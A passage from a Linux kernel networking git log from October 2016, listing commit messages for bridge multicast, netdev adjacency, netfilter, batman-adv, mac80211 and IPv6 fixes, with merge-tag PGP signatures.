multicast snooping has been disabled and the port goes to disabled state
then it will be deleted from the router port list, but if it moves into
non-disabled state it will not be re-added because the mcast snooping is
still disabled, and enabling snooping later does nothing.

Here are the steps to reproduce, setup br0 with snooping enabled and eth1
added as a perm router (multicast_router = 2):
1. $ echo 0 > /sys/class/net/br0/bridge/multicast_snooping
2. $ ip l set eth1 down
^ This step deletes the interface from the router list
3. $ ip l set eth1 up
^ This step does not add it again because mcast snooping is disabled
4. $ echo 1 > /sys/class/net/br0/bridge/multicast_snooping
5. $ bridge -d -s mdb show
<empty>

At this point we have mcast enabled and eth1 as a perm router (value = 2)
but it is not in the router list which is incorrect.

After this change:
1. $ echo 0 > /sys/class/net/br0/bridge/multicast_snooping
2. $ ip l set eth1 down
^ This step deletes the interface from the router list
3. $ ip l set eth1 up
^ This step does not add it again because mcast snooping is disabled
4. $ echo 1 > /sys/class/net/br0/bridge/multicast_snooping
5. $ bridge -d -s mdb show
router ports on br0: eth1

Note: we can directly do br_multicast_enable_port for all because the
querier timer already has checks for the port state and will simply
expire if it's in blocking/disabled. See the comment added by
commit 9aa6638216 ("bridge: multicast: add a comment to
br_port_state_selection about blocking state")

Fixes: 561f1103a2 ("bridge: Add multicast_snooping sysfs toggle")
Reported-by: Satish Ashok <sashok@cumulusnetworks.com>
Signed-off-by: Nikolay Aleksandrov <nikolay@cumulusnetworks.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-18 13:52:13 -04:00
David Ahern
67b62f98a1 net: dev: Improve debug statements for adjacency tracking
Adjacency code only has debugs for the insert case. Add debugs for
the remove path and make both consistently worded to make it easier
to follow the insert and removal with reference counts.

In addition, change the BUG to a WARN_ON. A missing adjacency at
removal time is not cause for a panic.

Signed-off-by: David Ahern <dsa@cumulusnetworks.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-18 11:45:00 -04:00
David Ahern
0f524a80ff net: Add warning if any lower device is still in adjacency list
Lower list should be empty just like upper.

Signed-off-by: David Ahern <dsa@cumulusnetworks.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-18 11:45:00 -04:00
David Ahern
f1170fd462 net: Remove all_adj_list and its references
Only direct adjacencies are maintained. All upper or lower devices can
be learned via the new walk API which recursively walks the adj_list for
upper devices or lower devices.

Signed-off-by: David Ahern <dsa@cumulusnetworks.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-18 11:45:00 -04:00
David Ahern
1a3f060c1a net: Introduce new api for walking upper and lower devices
This patch introduces netdev_walk_all_upper_dev_rcu,
netdev_walk_all_lower_dev and netdev_walk_all_lower_dev_rcu. These
functions recursively walk the adj_list of devices to determine all upper
and lower devices.

The functions take a callback function that is invoked for each device
in the list. If the callback returns non-0, the walk is terminated and
the functions return that code back to callers.

v3
- simplified netdev_has_upper_dev_all_rcu and __netdev_has_upper_dev and
  removed typecast as suggested by Stephen

v2
- fixed definition of netdev_next_lower_dev_rcu to mirror the upper_dev
  version.

Signed-off-by: David Ahern <dsa@cumulusnetworks.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-18 11:44:58 -04:00
David Ahern
790510d99f net: Remove refnr arg when inserting link adjacencies
Commit 93409033ae ("net: Add netdev all_adj_list refcnt propagation to
fix panic") propagated the refnr to insert and remove functions tracking
the netdev adjacency graph. However, for the insert path the refnr can
only be 1. Accordingly, remove the refnr argument to make that clear.
ie., the refnr arg in 93409033ae was only needed for the remove path.

Signed-off-by: David Ahern <dsa@cumulusnetworks.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-18 11:44:58 -04:00
Arnd Bergmann
d2e4d59351 netfilter: nf_tables: avoid uninitialized variable warning
The newly added nft_range_eval() function handles the two possible
nft range operations, but as the compiler warning points out,
any unexpected value would lead to the 'mismatch' variable being
used without being initialized:

net/netfilter/nft_range.c: In function 'nft_range_eval':
net/netfilter/nft_range.c:45:5: error: 'mismatch' may be used uninitialized in this function [-Werror=maybe-uninitialized]

This removes the variable in question and instead moves the
condition into the switch itself, which is potentially more
efficient than adding a bogus 'default' clause as in my
first approach, and is nicer than using the 'uninitialized_var'
macro.

Fixes: 0f3cd9b369 ("netfilter: nf_tables: add range expression")
Link: http://patchwork.ozlabs.org/patch/677114/
Signed-off-by: Arnd Bergmann <arnd@arndb.de>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-10-18 17:35:10 +02:00
Tobias Klauser
7ab488951a tcp: Remove unused but set variable
Remove the unused but set variable icsk in listening_get_next to fix the
following GCC warning when building with 'W=1':

  net/ipv4/tcp_ipv4.c: In function ‘listening_get_next’:
  net/ipv4/tcp_ipv4.c:1890:31: warning: variable ‘icsk’ set but not used [-Wunused-but-set-variable]

Signed-off-by: Tobias Klauser <tklauser@distanz.ch>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-18 10:34:27 -04:00
Tobias Klauser
7e1670c15c ipv4: Remove unused but set variable
Remove the unused but set variable dev in ip_do_fragment to fix the
following GCC warning when building with 'W=1':

  net/ipv4/ip_output.c: In function ‘ip_do_fragment’:
  net/ipv4/ip_output.c:541:21: warning: variable ‘dev’ set but not used [-Wunused-but-set-variable]

Signed-off-by: Tobias Klauser <tklauser@distanz.ch>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-18 10:30:28 -04:00
Tobias Klauser
8d324fd9e1 net/hsr: Remove unused but set variable
Remove the unused but set variable master_dev in check_local_dest to fix
the following GCC warning when building with 'W=1':

  net/hsr/hsr_forward.c: In function ‘check_local_dest’:
  net/hsr/hsr_forward.c:303:21: warning: variable ‘master_dev’ set but not used [-Wunused-but-set-variable]

Signed-off-by: Tobias Klauser <tklauser@distanz.ch>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-18 10:28:18 -04:00
David S. Miller
5cbee55736 This is relatively small, mostly to get the SG/crypto
from stack removal fix that crashes things when VMAP
 stack is used in conjunction with software crypto.
 
 Aside from that, we have:
  * a fix for AP_VLAN usage with the nl80211 frame command
  * two fixes (and two preparation patches) for A-MSDU, one
    to discard group-addressed (multicast) and unexpected
    4-address A-MSDUs, the other to validate A-MSDU inner
    MAC addresses properly to prevent controlled port bypass
 -----BEGIN PGP SIGNATURE-----
 
 iQIcBAABCgAGBQJYBcgKAAoJEGt7eEactAAdhUkP/jMVQbLMZ1Jcc9+lsPVGUIga
 I9GeQ4lcnD+4ASeJUhTtemC1IMNL4zMVqaIxbznDXKP7rZRrODVvCPk2TYIw9c5S
 rzF/TRierMFttLu3xY757nAsYg6T7F03JdOQ3SKIb3xOD8pXCWQoVRN14ldroRno
 4stOAtDrpD5wvK2JhlWv1EYlxGVLqLcakZt/BwgDX/cJGkAx49Q/s29FUnesB9Ep
 sCH5chffeQskOL9CrSwboNmucgt4HGQORc4UL/KtPOEBtyfu/LCXEKSqAKVyQZtZ
 OerouOHWqQE5lT2K6qD/KKFW4lV2t1h+xzqsvZk4ZR5o3s+PAGai6D/wf+JgY9Hk
 uor9ju/e0htcI9m0aFdHDnltV0OOwIhR2bxWTuBBUkyFVtdQQY+1MRTTtuunWIB4
 SDYv6LrNL/0HAIuTlPQH99rnsFNnRZCtTpdbT7GRckAMeWMvy19bF2ZB1FXuSn+h
 5dxIo0qkw8nv4Y9wQ6QmgOcSzYyidUrCgLTO516qXVAKY0kl/u4q/zPr0Fmx/qfY
 oxspelDv0qd2NMQwJ/AmwjAjkQBulv5DVLu+cDXdOMkc/EbhzWyvetcHiNukxjHn
 mukCBxTlLoDLug2LFkAPIddEutj+VUEefkf/pD/js8uYuyd9ZnPjiIh6fG25il9a
 cHbMYtANt2EnZjwI9Z74
 =T6t1
 -----END PGP SIGNATURE-----

Merge tag 'mac80211-for-davem-2016-10-18' of git://git.kernel.org/pub/scm/linux/kernel/git/jberg/mac80211

Johannes Berg says:

====================
This is relatively small, mostly to get the SG/crypto
from stack removal fix that crashes things when VMAP
stack is used in conjunction with software crypto.

Aside from that, we have:
 * a fix for AP_VLAN usage with the nl80211 frame command
 * two fixes (and two preparation patches) for A-MSDU, one
   to discard group-addressed (multicast) and unexpected
   4-address A-MSDUs, the other to validate A-MSDU inner
   MAC addresses properly to prevent controlled port bypass
====================

Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-18 10:26:15 -04:00
Tobias Klauser
403f0727cb vlan: Remove unnecessary comparison of unsigned against 0
args.u.name_type is of type unsigned int and is always >= 0.

This fixes the following GCC warning:

  net/8021q/vlan.c: In function ‘vlan_ioctl_handler’:
  net/8021q/vlan.c:574:14: warning: comparison of unsigned expression >= 0 is always true [-Wtype-limits]

Signed-off-by: Tobias Klauser <tklauser@distanz.ch>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-18 10:25:34 -04:00
Markus Elfring
393b299d2c batman-adv: Less function calls in batadv_is_ap_isolated() after error detection
The variables "tt_local_entry" and "tt_global_entry" were eventually
checked again despite of a corresponding null pointer test before.

* Avoid this double check by reordering a function call sequence
  and the better selection of jump targets.

* Omit the initialisation for these variables at the beginning then.

Signed-off-by: Markus Elfring <elfring@users.sourceforge.net>
Signed-off-by: Sven Eckelmann <sven@narfation.org>
Signed-off-by: Simon Wunderlich <sw@simonwunderlich.de>
2016-10-18 15:02:43 +02:00
Wei Yongjun
320c975f18 cfg80211: fix possible memory leak in cfg80211_iter_combinations()
'limits' is malloced in cfg80211_iter_combinations() and should be freed
before leaving from the error handling cases, otherwise it will cause
memory leak.

Fixes: 0c317a02ca ("cfg80211: support virtual interfaces with different beacon intervals")
Signed-off-by: Wei Yongjun <weiyongjun1@huawei.com>
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-18 08:52:00 +02:00
Jakub Kicinski
a0e65de715 net: report right mtu value in error message
Check is for max_mtu but message reports min_mtu.

Signed-off-by: Jakub Kicinski <jakub.kicinski@netronome.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-17 13:13:23 -04:00
Pablo Neira Ayuso
ccca6607c5 netfilter: nft_range: validate operation netlink attribute
Use nft_parse_u32_check() to make sure we don't get a value over the
unsigned 8-bit integer. Moreover, make sure this value doesn't go over
the two supported range comparison modes.

Fixes: 9286c2eb1fda ("netfilter: nft_range: validate operation netlink attribute")
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-10-17 18:57:02 +02:00
Dan Carpenter
21a9e0f156 netfilter: nft_exthdr: fix error handling in nft_exthdr_init()
"err" needs to be signed for the error handling to work.

Fixes: 36b701fae1 ('netfilter: nf_tables: validate maximum value of u32 netlink attributes')
Signed-off-by: Dan Carpenter <dan.carpenter@oracle.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-10-17 17:43:54 +02:00
Dan Carpenter
09525a09ad netfilter: nf_tables: underflow in nft_parse_u32_check()
We don't want to allow negatives here.

Fixes: 36b701fae1 ('netfilter: nf_tables: validate maximum value of u32 netlink attributes')
Signed-off-by: Dan Carpenter <dan.carpenter@oracle.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-10-17 17:43:53 +02:00
Liping Zhang
5751e175c6 netfilter: nft_hash: add missing NFTA_HASH_OFFSET's nla_policy
Missing the nla_policy description will also miss the validation check
in kernel.

Fixes: 70ca767ea1 ("netfilter: nft_hash: Add hash offset value")
Signed-off-by: Liping Zhang <liping.zhang@spreadtrum.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-10-17 17:43:53 +02:00
Liping Zhang
f434ed0a00 netfilter: xt_ipcomp: add "ip[6]t_ipcomp" module alias name
Otherwise, user cannot add related rules if xt_ipcomp.ko is not loaded:
  # iptables -A OUTPUT -p 108 -m ipcomp --ipcompspi 1
  iptables: No chain/target/match by that name.

Signed-off-by: Liping Zhang <liping.zhang@spreadtrum.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-10-17 17:38:19 +02:00
Liping Zhang
6d19375b58 netfilter: xt_NFLOG: fix unexpected truncated packet
Justin and Chris spotted that iptables NFLOG target was broken when they
upgraded the kernel to 4.8: "ulogd-2.0.5- IPs are no longer logged" or
"results in segfaults in ulogd-2.0.5".

Because "struct nf_loginfo li;" is a local variable, and flags will be
filled with garbage value, not inited to zero. So if it contains 0x1,
packets will not be logged to the userspace anymore.

Fixes: 7643507fe8 ("netfilter: xt_NFLOG: nflog-range does not truncate packets")
Reported-by: Justin Piszcz <jpiszcz@lucidpixels.com>
Reported-by: Chris Caputo <ccaputo@alt.net>
Tested-by: Chris Caputo <ccaputo@alt.net>
Signed-off-by: Liping Zhang <liping.zhang@spreadtrum.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-10-17 17:38:19 +02:00
Anders K. Pedersen
a8b1e36d0d netfilter: nft_dynset: fix element timeout for HZ != 1000
With HZ=100 element timeout in dynamic sets (i.e. flow tables) is 10 times
higher than configured.

Add proper conversion to/from jiffies, when interacting with userspace.

I tested this on Linux 4.8.1, and it applies cleanly to current nf and
nf-next trees.

Fixes: 22fe54d5fe ("netfilter: nf_tables: add support for dynamic set updates")
Signed-off-by: Anders K. Pedersen <akp@cohaesio.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-10-17 17:29:39 +02:00
Geert Uytterhoeven
1b203c138c netfilter: xt_hashlimit: Add missing ULL suffixes for 64-bit constants
On 32-bit (e.g. with m68k-linux-gnu-gcc-4.1):

    net/netfilter/xt_hashlimit.c: In function ‘user2credits’:
    net/netfilter/xt_hashlimit.c:476: warning: integer constant is too large for ‘long’ type
    ...
    net/netfilter/xt_hashlimit.c:478: warning: integer constant is too large for ‘long’ type
    ...
    net/netfilter/xt_hashlimit.c:480: warning: integer constant is too large for ‘long’ type
    ...

    net/netfilter/xt_hashlimit.c: In function ‘rateinfo_recalc’:
    net/netfilter/xt_hashlimit.c:513: warning: integer constant is too large for ‘long’ type

Fixes: 11d5f15723 ("netfilter: xt_hashlimit: Create revision 2 to support higher pps rates")
Signed-off-by: Geert Uytterhoeven <geert@linux-m68k.org>
Acked-by: Vishwanath Pai <vpai@akamai.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-10-17 17:25:23 +02:00
Joe Perches
9c7cbcf5a8 rds: Remove duplicate prefix from rds_conn_path_error use
rds_conn_path_error already prefixes "RDS:" to the output.

Signed-off-by: Joe Perches <joe@perches.com>
Acked-by: Sowmini Varadhan <sowmini.varadhan@oracle.com>
Acked-by: Santosh Shilimkar <santosh.shilimkar@oracle.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-17 11:07:22 -04:00
Joe Perches
e81c7b69c8 rds: Remove unused rds_conn_error
This macro's last use was removed in commit d769ef81d5
("RDS: Update rds_conn_shutdown to work with rds_conn_path")
so make the macro and the __rds_conn_error function definition
and declaration disappear.

Signed-off-by: Joe Perches <joe@perches.com>
Acked-by: Sowmini Varadhan <sowmini.varadhan@oracle.com>
Acked-by: Santosh Shilimkar <santosh.shilimkar@oracle.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-17 11:07:22 -04:00
Eric Dumazet
9a0b1e8ba4 net: pktgen: remove rcu locking in pktgen_change_name()
After Jesper commit back in linux-3.18, we trigger a lockdep
splat in proc_create_data() while allocating memory from
pktgen_change_name().

This patch converts t->if_lock to a mutex, since it is now only
used from control path, and adds proper locking to pktgen_change_name()

1) pktgen_thread_lock to protect the outer loop (iterating threads)
2) t->if_lock to protect the inner loop (iterating devices)

Note that before Jesper patch, pktgen_change_name() was lacking proper
protection, but lockdep was not able to detect the problem.

Fixes: 8788370a1d ("pktgen: RCU-ify "if_list" to remove lock in next_to_run()")
Reported-by: John Sperbeck <jsperbeck@google.com>
Signed-off-by: Eric Dumazet <edumazet@google.com>
Cc: Jesper Dangaard Brouer <brouer@redhat.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-17 10:52:59 -04:00
Tom Herbert
ab3a70bef8 ila: Don't use dest cache when gateway is set
If the gateway is set on an ILA route we don't need to bother with using
the destination cache in the ILA route. Translation does not change the
routing in this case so we can stick with orig_output in the lwstate
output function.

Tested: Ran netperf with and without gateway for LWT route.

Signed-off-by: Tom Herbert <tom@herbertland.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-17 10:30:18 -04:00
Linus Lüssing
0566df307b batman-adv: Allow selecting BATMAN V if CFG80211 is not built
With the new stub for cfg80211_get_station(), we can now build the
BATMAN V protocol even with a kernel that was built without any
wireless support.

Signed-off-by: Linus Lüssing <linus.luessing@c0d3.blue>
Signed-off-by: Sven Eckelmann <sven@narfation.org>
Signed-off-by: Simon Wunderlich <sw@simonwunderlich.de>
2016-10-17 16:28:48 +02:00
Antonio Quartulli
843314c977 batman-adv: remove unsed argument from batadv_dbg_arp() function
The argument "type" passed to the batadv_dbg_arp() function is
never used. Remove it.

Signed-off-by: Antonio Quartulli <a@unstable.cc>
Signed-off-by: Sven Eckelmann <sven@narfation.org>
Signed-off-by: Simon Wunderlich <sw@simonwunderlich.de>
2016-10-17 16:28:47 +02:00
Linus Lüssing
6020a86a4a batman-adv: fix batadv_forw_packet kerneldoc for list attribute
The forw_packet list node is wrongly attributed to the icmp socket code.

Signed-off-by: Linus Lüssing <linus.luessing@c0d3.blue>
Signed-off-by: Sven Eckelmann <sven@narfation.org>
Signed-off-by: Simon Wunderlich <sw@simonwunderlich.de>
2016-10-17 16:28:47 +02:00
Sven Eckelmann
bf093191db batman-adv: Remove unused batadv_icmp_user_cmd_type
Signed-off-by: Sven Eckelmann <sven@narfation.org>
Signed-off-by: Simon Wunderlich <sw@simonwunderlich.de>
2016-10-17 16:28:46 +02:00
Sven Eckelmann
c408c1b9d4 batman-adv: Move batadv_sum_counter to soft-interface.c
The function batadv_sum_counter is only used in soft-interface.c and has no
special relevance for main.h.

Signed-off-by: Sven Eckelmann <sven@narfation.org>
Signed-off-by: Simon Wunderlich <sw@simonwunderlich.de>
2016-10-17 16:28:46 +02:00
Sven Eckelmann
739ae86cd2 batman-adv: Remove unused function batadv_hash_delete
Signed-off-by: Sven Eckelmann <sven@narfation.org>
Signed-off-by: Simon Wunderlich <sw@simonwunderlich.de>
2016-10-17 16:28:45 +02:00
David Ahern
a04a480d43 net: Require exact match for TCP socket lookups if dif is l3mdev
Currently, socket lookups for l3mdev (vrf) use cases can match a socket
that is bound to a port but not a device (ie., a global socket). If the
sysctl tcp_l3mdev_accept is not set this leads to ack packets going out
based on the main table even though the packet came in from an L3 domain.
The end result is that the connection does not establish creating
confusion for users since the service is running and a socket shows in
ss output. Fix by requiring an exact dif to sk_bound_dev_if match if the
skb came through an interface enslaved to an l3mdev device and the
tcp_l3mdev_accept is not set.

skb's through an l3mdev interface are marked by setting a flag in
inet{6}_skb_parm. The IPv6 variant is already set; this patch adds the
flag for IPv4. Using an skb flag avoids a device lookup on the dif. The
flag is set in the VRF driver using the IP{6}CB macros. For IPv4, the
inet_skb_parm struct is moved in the cb per commit 971f10eca1, so the
match function in the TCP stack needs to use TCP_SKB_CB. For IPv6, the
move is done after the socket lookup, so IP6CB is used.

The flags field in inet_skb_parm struct needs to be increased to add
another flag. There is currently a 1-byte hole following the flags,
so it can be expanded to u16 without increasing the size of the struct.

Fixes: 193125dbd8 ("net: Introduce VRF device driver")
Signed-off-by: David Ahern <dsa@cumulusnetworks.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-17 10:17:05 -04:00
Ard Biesheuvel
f4a067f9ff mac80211: move struct aead_req off the stack
Some crypto implementations (such as the generic CCM wrapper in crypto/)
use scatterlists to map fields of private data in their struct aead_req.
This means these data structures cannot live in the vmalloc area, which
means that they cannot live on the stack (with CONFIG_VMAP_STACK.)

This currently occurs only with the generic software implementation, but
the private data and usage is implementation specific, so move the whole
data structures off the stack into heap by allocating every time we need
to use them.

In addition, take care not to put any of our own stack allocations into
scatterlists. This involves reserving some extra room when allocating the
aead_request structures, and referring to those allocations in the scatter-
lists (while copying the data from the stack before the crypto operation)

Signed-off-by: Ard Biesheuvel <ard.biesheuvel@linaro.org>
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-17 16:14:04 +02:00
Sven Eckelmann
611b975b5c batman-adv: Add BATADV_DBG_TP_METER to BATADV_DBG_ALL
The BATADV_DBG_ALL has to contain the bit of BATADV_DBG_TP_METER to really
support all available debug messages.

Fixes: 33a3bb4a33 ("batman-adv: throughput meter implementation")
Signed-off-by: Sven Eckelmann <sven@narfation.org>
Signed-off-by: Simon Wunderlich <sw@simonwunderlich.de>
2016-10-17 16:11:56 +02:00
Sven Eckelmann
9ca488dd53 batman-adv: Modify neigh_list only with rcu-list functions
The batadv_hard_iface::neigh_list is accessed via rcu based primitives.
Thus all operations done on it have to fulfill the requirements by RCU. So
using non-RCU mechanisms like hlist_add_head is not allowed because it
misses the barriers required to protect concurrent readers when accessing
the data behind the pointer.

Fixes: cef63419f7 ("batman-adv: add list of unique single hop neighbors per hard-interface")
Signed-off-by: Sven Eckelmann <sven.eckelmann@open-mesh.com>
Acked-by: Linus Lüssing <linus.luessing@c0d3.blue>
Signed-off-by: Simon Wunderlich <sw@simonwunderlich.de>
2016-10-17 16:10:53 +02:00
Simon Wunderlich
4a2d09e31d batman-adv: Start new development cycle
Signed-off-by: Simon Wunderlich <sw@simonwunderlich.de>
2016-10-17 14:10:28 +02:00
Michael Braun
a3e2f4b6ed mac80211: fix A-MSDU outer SA/DA
According to IEEE 802.11-2012 section 8.3.2 table 8-19, the outer SA/DA
of A-MSDU frames need to be changed depending on FromDS/ToDS values.

Signed-off-by: Michael Braun <michael-dev@fami-braun.de>
[use ether_addr_copy and add alignment annotations]
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-17 11:43:33 +02:00
Michael Braun
06f2bb1e01 mac80211: avoid extra memcpy in A-MSDU head creation
Signed-off-by: Michael Braun <michael-dev@fami-braun.de>
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-17 11:41:23 +02:00
Johannes Berg
f83ace3b1e nl80211: ifdef WoWLAN related policies
To avoid unused variable warnings when CONFIG_PM isn't set,
add the appropriate ifdef to the policies that are only used
for WoWLAN, which can only be invoked when CONFIG_PM is set.

Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-17 08:04:07 +02:00
Johannes Berg
1609d18de6 nl80211: correctly use nl80211_nan_srf_policy
This was clearly intended to be used in the attribute parsing,
so do that instead of leaving the attribute policy unused.

Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-17 08:02:48 +02:00
Tom Herbert
79ff2fc31e ila: Cache a route to translated address
Add a dst_cache to ila_lwt structure. This holds a cached route for the
translated address. In ila_output we now perform a route lookup after
translation and if possible (destination in original route is full 128
bits) we set the dst_cache. Subsequent calls to ila_output can then use
the cache to avoid the route lookup.

This eliminates the need to set the gateway on ILA routes as previously
was being done. Now we can do something like:

./ip route add 3333::2000:0:0:2/128 encap ila 2222:0:0:2 \
    csum-mode neutral-map dev eth0  ## No via needed!

Signed-off-by: Tom Herbert <tom@herbertland.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-15 17:33:41 -04:00
Tom Herbert
1104d9ba44 lwtunnel: Add destroy state operation
Users of lwt tunnels may set up some secondary state in build_state
function. Add a corresponding destroy_state function to allow users to
clean up state. This destroy state function is called from lwstate_free.
Also, we now free lwstate using kfree_rcu so user can assume structure
is not freed before rcu.

Acked-by: Roopa Prabhu <roopa@cumulusnetworks.com>
Signed-off-by: Tom Herbert <tom@herbertland.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-15 17:33:41 -04:00
Linus Torvalds
9ffc66941d This adds a new gcc plugin named "latent_entropy". It is designed to
extract as much possible uncertainty from a running system at boot time as
 possible, hoping to capitalize on any possible variation in CPU operation
 (due to runtime data differences, hardware differences, SMP ordering,
 thermal timing variation, cache behavior, etc).
 
 At the very least, this plugin is a much more comprehensive example for
 how to manipulate kernel code using the gcc plugin internals.
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1
 Comment: Kees Cook <kees@outflux.net>
 
 iQIcBAABCgAGBQJX/BAFAAoJEIly9N/cbcAmzW8QALFbCs7EFFkML+M/M/9d8zEk
 1QbUs/z8covJTTT1PjSdw7JUrAMulI3S00owpcQVd/PcWjRPU80QwfsXBgIB0tvC
 Kub2qxn6Oaf+kTB646zwjFgjdCecw/USJP+90nfcu2+LCnE8ReclKd1aUee+Bnhm
 iDEUyH2ONIoWq6ta2Z9sA7+E4y2ZgOlmW0iga3Mnf+OcPtLE70fWPoe5E4g9DpYk
 B+kiPDrD9ql5zsHaEnKG1ldjiAZ1L6Grk8rGgLEXmbOWtTOFmnUhR+raK5NA/RCw
 MXNuyPay5aYPpqDHFm+OuaWQAiPWfPNWM3Ett4k0d9ZWLixTcD1z68AciExwk7aW
 SEA8b1Jwbg05ZNYM7NJB6t6suKC4dGPxWzKFOhmBicsh2Ni5f+Az0BQL6q8/V8/4
 8UEqDLuFlPJBB50A3z5ngCVeYJKZe8Bg/Swb4zXl6mIzZ9darLzXDEV6ystfPXxJ
 e1AdBb41WC+O2SAI4l64yyeswkGo3Iw2oMbXG5jmFl6wY/xGp7dWxw7gfnhC6oOh
 afOT54p2OUDfSAbJaO0IHliWoIdmE5ZYdVYVU9Ek+uWyaIwcXhNmqRg+Uqmo32jf
 cP5J9x2kF3RdOcbSHXmFp++fU+wkhBtEcjkNpvkjpi4xyA47IWS7lrVBBebrCq9R
 pa/A7CNQwibIV6YD8+/p
 =1dUK
 -----END PGP SIGNATURE-----

Merge tag 'gcc-plugins-v4.9-rc1' of git://git.kernel.org/pub/scm/linux/kernel/git/kees/linux

Pull gcc plugins update from Kees Cook:
 "This adds a new gcc plugin named "latent_entropy". It is designed to
  extract as much possible uncertainty from a running system at boot
  time as possible, hoping to capitalize on any possible variation in
  CPU operation (due to runtime data differences, hardware differences,
  SMP ordering, thermal timing variation, cache behavior, etc).

  At the very least, this plugin is a much more comprehensive example
  for how to manipulate kernel code using the gcc plugin internals"

* tag 'gcc-plugins-v4.9-rc1' of git://git.kernel.org/pub/scm/linux/kernel/git/kees/linux:
  latent_entropy: Mark functions with __latent_entropy
  gcc-plugins: Add latent_entropy plugin
2016-10-15 10:03:15 -07:00
Jiri Bohac
76506a986d IPv6: fix DESYNC_FACTOR
The IPv6 temporary address generation uses a variable called DESYNC_FACTOR
to prevent hosts updating the addresses at the same time. Quoting RFC 4941:

   ... The value DESYNC_FACTOR is a random value (different for each
   client) that ensures that clients don't synchronize with each other and
   generate new addresses at exactly the same time ...

DESYNC_FACTOR is defined as:

   DESYNC_FACTOR -- A random value within the range 0 - MAX_DESYNC_FACTOR.
   It is computed once at system start (rather than each time it is used)
   and must never be greater than (TEMP_VALID_LIFETIME - REGEN_ADVANCE).

First, I believe the RFC has a typo in it and meant to say: "and must
never be greater than (TEMP_PREFERRED_LIFETIME - REGEN_ADVANCE)"

The reason is that at various places in the RFC, DESYNC_FACTOR is used in
a calculation like (TEMP_PREFERRED_LIFETIME - DESYNC_FACTOR) or
(TEMP_PREFERRED_LIFETIME - REGEN_ADVANCE - DESYNC_FACTOR). It needs to be
smaller than (TEMP_PREFERRED_LIFETIME - REGEN_ADVANCE) for the result of
these calculations to be larger than zero. It's never used in a
calculation together with TEMP_VALID_LIFETIME.

I already submitted an errata to the rfc-editor:
https://www.rfc-editor.org/errata_search.php?rfc=4941

The Linux implementation of DESYNC_FACTOR is very wrong:
max_desync_factor is used in places DESYNC_FACTOR should be used.
max_desync_factor is initialized to the RFC-recommended value for
MAX_DESYNC_FACTOR (600) but the whole point is to get a _random_ value.

And nothing ensures that the value used is not greater than
(TEMP_PREFERRED_LIFETIME - REGEN_ADVANCE), which leads to underflows.  The
effect can easily be observed when setting the temp_prefered_lft sysctl
e.g. to 60. The preferred lifetime of the temporary addresses will be
bogus.

TEMP_PREFERRED_LIFETIME and REGEN_ADVANCE are not constants and can be
influenced by these three sysctls: regen_max_retry, dad_transmits and
temp_prefered_lft. Thus, the upper bound for desync_factor needs to be
re-calculated each time a new address is generated and if desync_factor is
larger than the new upper bound, a new random value needs to be
re-generated.

And since we already have max_desync_factor configurable per interface, we
also need to calculate and store desync_factor per interface.

Signed-off-by: Jiri Bohac <jbohac@suse.cz>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-14 10:59:15 -04:00
Jiri Bohac
9d6280da39 IPv6: Drop the temporary address regen_timer
The randomized interface identifier (rndid) was periodically updated from
the regen_timer timer. Simplify the code by updating the rndid only when
needed by ipv6_try_regen_rndid().

This makes the follow-up DESYNC_FACTOR fix much simpler.  Also it fixes a
reference counting error in this error path, where an in6_dev_put was
missing:
		err = addrconf_sysctl_register(ndev);
		if (err) {
			ipv6_mc_destroy_dev(ndev);
	-               del_timer(&ndev->regen_timer);
			snmp6_unregister_dev(ndev);
			goto err_release;

Signed-off-by: Jiri Bohac <jbohac@suse.cz>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-14 10:59:15 -04:00
David S. Miller
f1f081cef0 RxRPC rewrite
-----BEGIN PGP SIGNATURE-----
 
 iQIVAwUAV/+wwfSw1s6N8H32AQLpVA/+NByreKyI8cHL1zgz816iTrzYbEP5Gbtw
 RI9TI5iweUa9ySe4PFQUw+VC0yaAP9brY8tTtss8KHk808Wu4xhlg8fAClOaZXwy
 WmHASdwnRaDWguEpPHyHRST+s9ZO/VD5vwGhREB/hojzdzd135bq1d6GKaHoLFx2
 XDwDeyZc1z+aSzdMCoQuKJlqw9mfujsIOK5xZJ/h/JquYJ3iER55vdofettNCT+S
 hjueVBgWV988oORBtduPrfUYBbQI83QyiWl0xdo6QXWAoN784NfpVti8YAA9B7To
